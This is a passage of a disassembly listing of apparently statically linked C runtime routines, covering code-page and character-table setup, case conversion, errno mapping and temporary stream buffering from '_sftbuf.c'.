loc_4293AF: ; CODE XREF: sub_4290B0+2EE�j
call sub_429560
push 19h
call sub_423320
add esp, 4
xor eax, eax
jmp short loc_4293F0
; ---------------------------------------------------------------------------
loc_4293C2: ; CODE XREF: sub_4290B0+1D0�j
cmp ds:dword_4F33E4, 0
jz short loc_4293E3
call sub_4294E0
call sub_429560
push 19h
call sub_423320
add esp, 4
xor eax, eax
jmp short loc_4293F0
; ---------------------------------------------------------------------------
loc_4293E3: ; CODE XREF: sub_4290B0+319�j
push 19h
call sub_423320
add esp, 4
or eax, 0FFFFFFFFh
loc_4293F0: ; CODE XREF: sub_4290B0+36�j
; sub_4290B0+57�j ...
mov esp, ebp
pop ebp
retn
sub_4290B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429400 proc near ; CODE XREF: sub_4290B0+14�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ds:dword_4F33E4, 0
cmp [ebp+arg_0], 0FFFFFFFEh
jnz short loc_429425
mov ds:dword_4F33E4, 1
call ds:dword_4F54E8 ; GetOEMCP
jmp short loc_429457
; ---------------------------------------------------------------------------
loc_429425: ; CODE XREF: sub_429400+11�j
cmp [ebp+arg_0], 0FFFFFFFDh
jnz short loc_42943D
mov ds:dword_4F33E4, 1
call ds:dword_4F54E4 ; GetACP
jmp short loc_429457
; ---------------------------------------------------------------------------
loc_42943D: ; CODE XREF: sub_429400+29�j
cmp [ebp+arg_0], 0FFFFFFFCh
jnz short loc_429454
mov ds:dword_4F33E4, 1
mov eax, ds:dword_4F3408
jmp short loc_429457
; ---------------------------------------------------------------------------
loc_429454: ; CODE XREF: sub_429400+41�j
mov eax, [ebp+arg_0]
loc_429457: ; CODE XREF: sub_429400+23�j
; sub_429400+3B�j ...
pop ebp
retn
sub_429400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429460 proc near ; CODE XREF: sub_4290B0+161�p
; sub_4290B0+2B5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
sub ecx, 3A4h
mov [ebp+var_4], ecx
cmp [ebp+var_4], 12h
ja short loc_4294AA
mov eax, [ebp+var_4]
xor edx, edx
mov dl, byte_4294C4[eax]
jmp off_4294B0[edx*4]
loc_42948E: ; DATA XREF: _0:off_4294B0�o
mov eax, 411h
jmp short loc_4294AC
; ---------------------------------------------------------------------------
loc_429495: ; CODE XREF: sub_429460+27�j
; DATA XREF: _0:004294B4�o
mov eax, 804h
jmp short loc_4294AC
; ---------------------------------------------------------------------------
loc_42949C: ; CODE XREF: sub_429460+27�j
; DATA XREF: _0:004294B8�o
mov eax, 412h
jmp short loc_4294AC
; ---------------------------------------------------------------------------
loc_4294A3: ; CODE XREF: sub_429460+27�j
; DATA XREF: _0:004294BC�o
mov eax, 404h
jmp short loc_4294AC
; ---------------------------------------------------------------------------
loc_4294AA: ; CODE XREF: sub_429460+1A�j
; sub_429460+27�j
; DATA XREF: ...
xor eax, eax
loc_4294AC: ; CODE XREF: sub_429460+33�j
; sub_429460+3A�j ...
mov esp, ebp
pop ebp
retn
sub_429460 endp
; ---------------------------------------------------------------------------
off_4294B0 dd offset loc_42948E ; DATA XREF: sub_429460+27�r
dd offset loc_429495
dd offset loc_42949C
dd offset loc_4294A3
dd offset loc_4294AA
byte_4294C4 db 0 ; DATA XREF: sub_429460+21�r
db 3 dup(4)
dd 4040401h, 2 dup(4040404h), 0CC030204h, 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4294E0 proc near ; CODE XREF: sub_4290B0+41�p
; sub_4290B0+31B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_4294F6
; ---------------------------------------------------------------------------
loc_4294ED: ; CODE XREF: sub_4294E0+29�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_4294F6: ; CODE XREF: sub_4294E0+B�j
cmp [ebp+var_4], 101h
jge short loc_42950B
mov ecx, [ebp+var_4]
mov ds:byte_4F38E0[ecx], 0
jmp short loc_4294ED
; ---------------------------------------------------------------------------
loc_42950B: ; CODE XREF: sub_4294E0+1D�j
mov ds:dword_4F37CC, 0
mov ds:dword_4F37DC, 0
mov ds:dword_4F39E4, 0
mov [ebp+var_4], 0
jmp short loc_42953B
; ---------------------------------------------------------------------------
loc_429532: ; CODE XREF: sub_4294E0+6E�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42953B: ; CODE XREF: sub_4294E0+50�j
cmp [ebp+var_4], 6
jge short loc_429550
mov eax, [ebp+var_4]
mov ds:word_4F37D0[eax*2], 0
jmp short loc_429532
; ---------------------------------------------------------------------------
loc_429550: ; CODE XREF: sub_4294E0+5F�j
mov esp, ebp
pop ebp
retn
sub_4294E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429560 proc near ; CODE XREF: sub_4290B0+46�p
; sub_4290B0:loc_429254�p ...
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_418 = byte ptr -418h
var_318 = byte ptr -318h
var_312 = byte ptr -312h
var_304 = byte ptr -304h
var_204 = word ptr -204h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 51Ch
lea eax, [ebp+var_318]
push eax
mov ecx, ds:dword_4F37CC
push ecx
call ds:dword_4F54E0 ; GetCPInfo
cmp eax, 1
jnz loc_429799
mov [ebp+var_51C], 0
jmp short loc_4295A1
; ---------------------------------------------------------------------------
loc_429592: ; CODE XREF: sub_429560+60�j
mov edx, [ebp+var_51C]
add edx, 1
mov [ebp+var_51C], edx
loc_4295A1: ; CODE XREF: sub_429560+30�j
cmp [ebp+var_51C], 100h
jnb short loc_4295C2
mov eax, [ebp+var_51C]
mov cl, byte ptr [ebp+var_51C]
mov [ebp+eax+var_304], cl
jmp short loc_429592
; ---------------------------------------------------------------------------
loc_4295C2: ; CODE XREF: sub_429560+4B�j
mov [ebp+var_304], 20h
lea edx, [ebp+var_312]
mov [ebp+var_4], edx
jmp short loc_4295DD
; ---------------------------------------------------------------------------
loc_4295D4: ; CODE XREF: sub_429560:loc_429626�j
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
loc_4295DD: ; CODE XREF: sub_429560+72�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_429628
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_51C], ecx
jmp short loc_429606
; ---------------------------------------------------------------------------
loc_4295F7: ; CODE XREF: sub_429560+C4�j
mov edx, [ebp+var_51C]
add edx, 1
mov [ebp+var_51C], edx
loc_429606: ; CODE XREF: sub_429560+95�j
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax+1]
cmp [ebp+var_51C], ecx
ja short loc_429626
mov edx, [ebp+var_51C]
mov [ebp+edx+var_304], 20h
jmp short loc_4295F7
; ---------------------------------------------------------------------------
loc_429626: ; CODE XREF: sub_429560+B4�j
jmp short loc_4295D4
; ---------------------------------------------------------------------------
loc_429628: ; CODE XREF: sub_429560+86�j
push 0
mov eax, ds:dword_4F39E4
push eax
mov ecx, ds:dword_4F37CC
push ecx
lea edx, [ebp+var_204]
push edx
push 100h
lea eax, [ebp+var_304]
push eax
push 1
call sub_431210
add esp, 1Ch
push 0
mov ecx, ds:dword_4F37CC
push ecx
push 100h
lea edx, [ebp+var_418]
push edx
push 100h
lea eax, [ebp+var_304]
push eax
push 100h
mov ecx, ds:dword_4F39E4
push ecx
call sub_42EC50
add esp, 20h
push 0
mov edx, ds:dword_4F37CC
push edx
push 100h
lea eax, [ebp+var_518]
push eax
push 100h
lea ecx, [ebp+var_304]
push ecx
push 200h
mov edx, ds:dword_4F39E4
push edx
call sub_42EC50
add esp, 20h
mov [ebp+var_51C], 0
jmp short loc_4296D9
; ---------------------------------------------------------------------------
loc_4296CA: ; CODE XREF: sub_429560:loc_42978F�j
mov eax, [ebp+var_51C]
add eax, 1
mov [ebp+var_51C], eax
loc_4296D9: ; CODE XREF: sub_429560+168�j
cmp [ebp+var_51C], 100h
jnb loc_429794
mov ecx, [ebp+var_51C]
xor edx, edx
mov dx, [ebp+ecx*2+var_204]
and edx, 1
test edx, edx
jz short loc_429736
mov eax, [ebp+var_51C]
mov cl, ds:byte_4F38E1[eax]
or cl, 10h
mov edx, [ebp+var_51C]
mov ds:byte_4F38E1[edx], cl
mov eax, [ebp+var_51C]
mov ecx, [ebp+var_51C]
mov dl, [ebp+ecx+var_418]
mov ds:byte_4F37E0[eax], dl
jmp short loc_42978F
; ---------------------------------------------------------------------------
loc_429736: ; CODE XREF: sub_429560+19E�j
mov eax, [ebp+var_51C]
xor ecx, ecx
mov cx, [ebp+eax*2+var_204]
and ecx, 2
test ecx, ecx
jz short loc_429782
mov edx, [ebp+var_51C]
mov al, ds:byte_4F38E1[edx]
or al, 20h
mov ecx, [ebp+var_51C]
mov ds:byte_4F38E1[ecx], al
mov edx, [ebp+var_51C]
mov eax, [ebp+var_51C]
mov cl, [ebp+eax+var_518]
mov ds:byte_4F37E0[edx], cl
jmp short loc_42978F
; ---------------------------------------------------------------------------
loc_429782: ; CODE XREF: sub_429560+1EB�j
mov edx, [ebp+var_51C]
mov ds:byte_4F37E0[edx], 0
loc_42978F: ; CODE XREF: sub_429560+1D4�j
; sub_429560+220�j
jmp loc_4296CA
; ---------------------------------------------------------------------------
loc_429794: ; CODE XREF: sub_429560+183�j
jmp loc_42985E
; ---------------------------------------------------------------------------
loc_429799: ; CODE XREF: sub_429560+20�j
mov [ebp+var_51C], 0
jmp short loc_4297B4
; ---------------------------------------------------------------------------
loc_4297A5: ; CODE XREF: sub_429560:loc_429859�j
mov eax, [ebp+var_51C]
add eax, 1
mov [ebp+var_51C], eax
loc_4297B4: ; CODE XREF: sub_429560+243�j
cmp [ebp+var_51C], 100h
jnb loc_42985E
cmp [ebp+var_51C], 41h
jb short loc_429808
cmp [ebp+var_51C], 5Ah
ja short loc_429808
mov ecx, [ebp+var_51C]
mov dl, ds:byte_4F38E1[ecx]
or dl, 10h
mov eax, [ebp+var_51C]
mov ds:byte_4F38E1[eax], dl
mov ecx, [ebp+var_51C]
add ecx, 20h
mov edx, [ebp+var_51C]
mov ds:byte_4F37E0[edx], cl
jmp short loc_429859
; ---------------------------------------------------------------------------
loc_429808: ; CODE XREF: sub_429560+26B�j
; sub_429560+274�j
cmp [ebp+var_51C], 61h
jb short loc_42984C
cmp [ebp+var_51C], 7Ah
ja short loc_42984C
mov eax, [ebp+var_51C]
mov cl, ds:byte_4F38E1[eax]
or cl, 20h
mov edx, [ebp+var_51C]
mov ds:byte_4F38E1[edx], cl
mov eax, [ebp+var_51C]
sub eax, 20h
mov ecx, [ebp+var_51C]
mov ds:byte_4F37E0[ecx], al
jmp short loc_429859
; ---------------------------------------------------------------------------
loc_42984C: ; CODE XREF: sub_429560+2AF�j
; sub_429560+2B8�j
mov edx, [ebp+var_51C]
mov ds:byte_4F37E0[edx], 0
loc_429859: ; CODE XREF: sub_429560+2A6�j
; sub_429560+2EA�j
jmp loc_4297A5
; ---------------------------------------------------------------------------
loc_42985E: ; CODE XREF: sub_429560:loc_429794�j
; sub_429560+25E�j
mov esp, ebp
pop ebp
retn
sub_429560 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp ds:dword_4F37DC, 0
jz short loc_429883
mov eax, ds:dword_4F37CC
jmp short loc_429885
; ---------------------------------------------------------------------------
loc_429883: ; CODE XREF: _0:0042987A�j
xor eax, eax
loc_429885: ; CODE XREF: _0:00429881�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429890 proc near ; CODE XREF: sub_42F1D0+D�p
; sub_42F290+F�p ...
push ebp
mov ebp, esp
cmp ds:dword_4F4A2C, 0
jnz short loc_4298B0
push 0FFFFFFFDh
call sub_4290B0
add esp, 4
mov ds:dword_4F4A2C, 1
loc_4298B0: ; CODE XREF: sub_429890+A�j
pop ebp
retn
sub_429890 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4298C0 proc near ; CODE XREF: sub_41ED30+41�p
; sub_41ED30+11B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
cmp ds:dword_4F37DC, 0
jnz short loc_4298EC
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_41E510
add esp, 0Ch
jmp loc_4299E1
; ---------------------------------------------------------------------------
loc_4298EC: ; CODE XREF: sub_4298C0+11�j
push 19h
call sub_423280
add esp, 4
loc_4298F6: ; CODE XREF: sub_4298C0:loc_4299AE�j
cmp [ebp+arg_8], 0
jz loc_4299B3
mov ecx, [ebp+arg_8]
sub ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
xor ecx, ecx
mov cl, ds:byte_4F38E1[eax]
and ecx, 4
test ecx, ecx
jz short loc_429985
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
cmp [ebp+arg_8], 0
jnz short loc_42994A
mov ecx, [ebp+arg_0]
mov byte ptr [ecx-1], 0
jmp short loc_4299B3
; ---------------------------------------------------------------------------
loc_42994A: ; CODE XREF: sub_4298C0+7F�j
mov edx, [ebp+arg_8]
sub edx, 1
mov [ebp+arg_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
test ecx, ecx
jnz short loc_429983
mov ecx, [ebp+arg_0]
mov byte ptr [ecx-2], 0
jmp short loc_4299B3
; ---------------------------------------------------------------------------
loc_429983: ; CODE XREF: sub_4298C0+B8�j
jmp short loc_4299AE
; ---------------------------------------------------------------------------
loc_429985: ; CODE XREF: sub_4298C0+5D�j
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
test eax, eax
jnz short loc_4299AE
jmp short loc_4299B3
; ---------------------------------------------------------------------------
loc_4299AE: ; CODE XREF: sub_4298C0:loc_429983�j
; sub_4298C0+EA�j
jmp loc_4298F6
; ---------------------------------------------------------------------------
loc_4299B3: ; CODE XREF: sub_4298C0+3A�j
; sub_4298C0+88�j ...
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_8]
sub ecx, 1
mov [ebp+arg_8], ecx
test eax, eax
jz short loc_4299D4
mov edx, [ebp+arg_0]
mov byte ptr [edx], 0
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_4299B3
; ---------------------------------------------------------------------------
loc_4299D4: ; CODE XREF: sub_4298C0+101�j
push 19h
call sub_423320
add esp, 4
mov eax, [ebp+var_4]
loc_4299E1: ; CODE XREF: sub_4298C0+27�j
mov esp, ebp
pop ebp
retn
sub_4298C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4299F0 proc near ; CODE XREF: sub_41F470+2E�p
; sub_421420+1E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_429AA0
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov [ebp+var_4], 0
jmp short loc_429A10
; ---------------------------------------------------------------------------
loc_429A07: ; CODE XREF: sub_4299F0:loc_429A38�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_429A10: ; CODE XREF: sub_4299F0+15�j
cmp [ebp+var_4], 2Dh
jnb short loc_429A3A
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
cmp ecx, ds:dword_453F00[eax*8]
jnz short loc_429A38
call sub_429A90
mov edx, [ebp+var_4]
mov ecx, ds:dword_453F04[edx*8]
mov [eax], ecx
jmp short loc_429A7D
; ---------------------------------------------------------------------------
loc_429A38: ; CODE XREF: sub_4299F0+33�j
jmp short loc_429A07
; ---------------------------------------------------------------------------
loc_429A3A: ; CODE XREF: sub_4299F0+24�j
cmp [ebp+arg_0], 13h
jb short loc_429A53
cmp [ebp+arg_0], 24h
ja short loc_429A53
call sub_429A90
mov dword ptr [eax], 0Dh
jmp short loc_429A7D
; ---------------------------------------------------------------------------
loc_429A53: ; CODE XREF: sub_4299F0+4E�j
; sub_4299F0+54�j
cmp [ebp+arg_0], 0BCh
jb short loc_429A72
cmp [ebp+arg_0], 0CAh
ja short loc_429A72
call sub_429A90
mov dword ptr [eax], 8
jmp short loc_429A7D
; ---------------------------------------------------------------------------
loc_429A72: ; CODE XREF: sub_4299F0+6A�j
; sub_4299F0+73�j
call sub_429A90
mov dword ptr [eax], 16h
loc_429A7D: ; CODE XREF: sub_4299F0+46�j
; sub_4299F0+61�j ...
mov esp, ebp
pop ebp
retn
sub_4299F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429A90 proc near ; CODE XREF: sub_41F110:loc_41F3E2�p
; sub_421050:loc_4210AB�p ...
push ebp
mov ebp, esp
call sub_428EE0
add eax, 8
pop ebp
retn
sub_429A90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AA0 proc near ; CODE XREF: sub_421420+4A�p
; sub_422CB0+3C�p ...
push ebp
mov ebp, esp
call sub_428EE0
add eax, 0Ch
pop ebp
retn
sub_429AA0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
sub eax, 20h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AC0 proc near ; CODE XREF: sub_41F110+201�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F33F8, 0
jnz short loc_429AE7
cmp [ebp+arg_0], 61h
jl short loc_429AE2
cmp [ebp+arg_0], 7Ah
jg short loc_429AE2
mov eax, [ebp+arg_0]
sub eax, 20h
mov [ebp+arg_0], eax
loc_429AE2: ; CODE XREF: sub_429AC0+11�j
; sub_429AC0+17�j
mov eax, [ebp+arg_0]
jmp short loc_429B4F
; ---------------------------------------------------------------------------
loc_429AE7: ; CODE XREF: sub_429AC0+B�j
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_429B19
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov [ebp+var_4], 1
jmp short loc_429B20
; ---------------------------------------------------------------------------
loc_429B19: ; CODE XREF: sub_429AC0+39�j
mov [ebp+var_4], 0
loc_429B20: ; CODE XREF: sub_429AC0+57�j
mov ecx, [ebp+arg_0]
push ecx
call sub_429B60
add esp, 4
mov [ebp+arg_0], eax
cmp [ebp+var_4], 0
jz short loc_429B41
push 13h
call sub_423320
add esp, 4
jmp short loc_429B4C
; ---------------------------------------------------------------------------
loc_429B41: ; CODE XREF: sub_429AC0+73�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_429B4C: ; CODE XREF: sub_429AC0+7F�j
mov eax, [ebp+arg_0]
loc_429B4F: ; CODE XREF: sub_429AC0+25�j
mov esp, ebp
pop ebp
retn
sub_429AC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429B60 proc near ; CODE XREF: sub_429AC0+64�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp ds:dword_4F33F8, 0
jnz short loc_429B8C
cmp [ebp+arg_0], 61h
jl short loc_429B84
cmp [ebp+arg_0], 7Ah
jg short loc_429B84
mov eax, [ebp+arg_0]
sub eax, 20h
mov [ebp+arg_0], eax
loc_429B84: ; CODE XREF: sub_429B60+13�j
; sub_429B60+19�j
mov eax, [ebp+arg_0]
jmp loc_429C87
; ---------------------------------------------------------------------------
loc_429B8C: ; CODE XREF: sub_429B60+D�j
cmp [ebp+arg_0], 100h
jge short loc_429BD3
cmp ds:dword_453DF0, 1
jle short loc_429BB1
push 2
mov ecx, [ebp+arg_0]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_10], eax
jmp short loc_429BC5
; ---------------------------------------------------------------------------
loc_429BB1: ; CODE XREF: sub_429B60+3C�j
mov edx, [ebp+arg_0]
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 2
mov [ebp+var_10], ecx
loc_429BC5: ; CODE XREF: sub_429B60+4F�j
cmp [ebp+var_10], 0
jnz short loc_429BD3
mov eax, [ebp+arg_0]
jmp loc_429C87
; ---------------------------------------------------------------------------
loc_429BD3: ; CODE XREF: sub_429B60+33�j
; sub_429B60+69�j
mov edx, [ebp+arg_0]
sar edx, 8
and edx, 0FFh
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_429C1C
mov edx, [ebp+arg_0]
sar edx, 8
and edx, 0FFh
mov [ebp+var_8], dl
mov al, byte ptr [ebp+arg_0]
mov [ebp+var_7], al
mov [ebp+var_6], 0
mov [ebp+var_4], 2
jmp short loc_429C2D
; ---------------------------------------------------------------------------
loc_429C1C: ; CODE XREF: sub_429B60+98�j
mov cl, byte ptr [ebp+arg_0]
mov [ebp+var_8], cl
mov [ebp+var_7], 0
mov [ebp+var_4], 1
loc_429C2D: ; CODE XREF: sub_429B60+BA�j
push 1
push 0
push 3
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+var_4]
push eax
lea ecx, [ebp+var_8]
push ecx
push 200h
mov edx, ds:dword_4F33F8
push edx
call sub_42EC50
add esp, 20h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_429C61
mov eax, [ebp+arg_0]
jmp short loc_429C87
; ---------------------------------------------------------------------------
loc_429C61: ; CODE XREF: sub_429B60+FA�j
cmp [ebp+var_4], 1
jnz short loc_429C71
mov eax, [ebp+var_C]
and eax, 0FFh
jmp short loc_429C87
; ---------------------------------------------------------------------------
loc_429C71: ; CODE XREF: sub_429B60+105�j
mov eax, [ebp+var_C]
and eax, 0FFh
mov ecx, [ebp+var_C+1]
and ecx, 0FFh
shl ecx, 8
or eax, ecx
loc_429C87: ; CODE XREF: sub_429B60+27�j
; sub_429B60+6E�j ...
mov esp, ebp
pop ebp
retn
sub_429B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429C90 proc near ; CODE XREF: sub_41F4E0+79�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
loc_429C99: ; CODE XREF: sub_429C90+31�j
cmp [ebp+arg_0], 0
jnz short loc_429CBD
push offset dword_43C514
push 0
push 41h
push offset a_sftbuf_c ; "_sftbuf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_429CBD
int 3 ; Trap to Debugger
loc_429CBD: ; CODE XREF: sub_429C90+D�j
; sub_429C90+2A�j
xor eax, eax
test eax, eax
jnz short loc_429C99
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [edx+10h]
push eax
call sub_431A40
add esp, 4
test eax, eax
jnz short loc_429CE3
xor eax, eax
jmp loc_429DE0
; ---------------------------------------------------------------------------
loc_429CE3: ; CODE XREF: sub_429C90+4A�j
cmp [ebp+var_4], offset dword_451868
jnz short loc_429CF5
mov [ebp+var_8], 0
jmp short loc_429D0E
; ---------------------------------------------------------------------------
loc_429CF5: ; CODE XREF: sub_429C90+5A�j
cmp [ebp+var_4], offset dword_451888
jnz short loc_429D07
mov [ebp+var_8], 1
jmp short loc_429D0E
; ---------------------------------------------------------------------------
loc_429D07: ; CODE XREF: sub_429C90+6C�j
xor eax, eax
jmp loc_429DE0
; ---------------------------------------------------------------------------
loc_429D0E: ; CODE XREF: sub_429C90+63�j
; sub_429C90+75�j
mov ecx, ds:dword_4F336C
add ecx, 1
mov ds:dword_4F336C, ecx
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 10Ch
test eax, eax
jz short loc_429D33
xor eax, eax
jmp loc_429DE0
; ---------------------------------------------------------------------------
loc_429D33: ; CODE XREF: sub_429C90+9A�j
mov ecx, [ebp+var_8]
cmp ds:dword_4F33E8[ecx*4], 0
jnz short loc_429D9A
push 5Eh
push offset a_sftbuf_c ; "_sftbuf.c"
push 2
push 1000h
call sub_41BE70
add esp, 10h
mov edx, [ebp+var_8]
mov ds:dword_4F33E8[edx*4], eax
mov eax, [ebp+var_8]
cmp ds:dword_4F33E8[eax*4], 0
jnz short loc_429D9A
mov ecx, [ebp+var_4]
add ecx, 14h
mov edx, [ebp+var_4]
mov [edx+8], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [ecx+8]
mov [eax], edx
mov eax, [ebp+var_4]
mov dword ptr [eax+18h], 2
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 2
jmp short loc_429DC9
; ---------------------------------------------------------------------------
loc_429D9A: ; CODE XREF: sub_429C90+AE�j
; sub_429C90+DB�j
mov edx, [ebp+var_4]
mov eax, [ebp+var_8]
mov ecx, ds:dword_4F33E8[eax*4]
mov [edx+8], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+var_4]
mov ecx, [eax+8]
mov [edx], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx+18h], 1000h
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 1000h
loc_429DC9: ; CODE XREF: sub_429C90+108�j
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
or edx, 1102h
mov eax, [ebp+var_4]
mov [eax+0Ch], edx
mov eax, 1
loc_429DE0: ; CODE XREF: sub_429C90+4E�j
; sub_429C90+79�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_429C90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429DF0 proc near ; CODE XREF: sub_41F4E0+A3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_429DF7: ; CODE XREF: sub_429DF0+38�j
cmp [ebp+arg_0], 0
jz short loc_429E24
cmp [ebp+arg_0], 1
jz short loc_429E24
push offset aFlag0Flag1 ; "flag == 0 || flag == 1"
push 0
push 0A1h
push offset a_sftbuf_c ; "_sftbuf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_429E24
int 3 ; Trap to Debugger
loc_429E24: ; CODE XREF: sub_429DF0+B�j
; sub_429DF0+11�j ...
xor eax, eax
test eax, eax
jnz short loc_429DF7
mov ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
cmp [ebp+arg_0], 0
jz short loc_429E7D
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 1000h
test eax, eax
jz short loc_429E7D
mov ecx, [ebp+var_4]
push ecx
call sub_422F20
add esp, 4
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and ah, 0EEh
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
mov dword ptr [edx+18h], 0
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+8], 0
loc_429E7D: ; CODE XREF: sub_429DF0+44�j
; sub_429DF0+53�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_429DF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429E90 proc near ; CODE XREF: sub_41FF30+A2�p
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = dword ptr -200h
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1F4 = dword ptr -1F4h
var_1F0 = byte ptr -1F0h
var_1EF = byte ptr -1EFh
var_1EC = dword ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
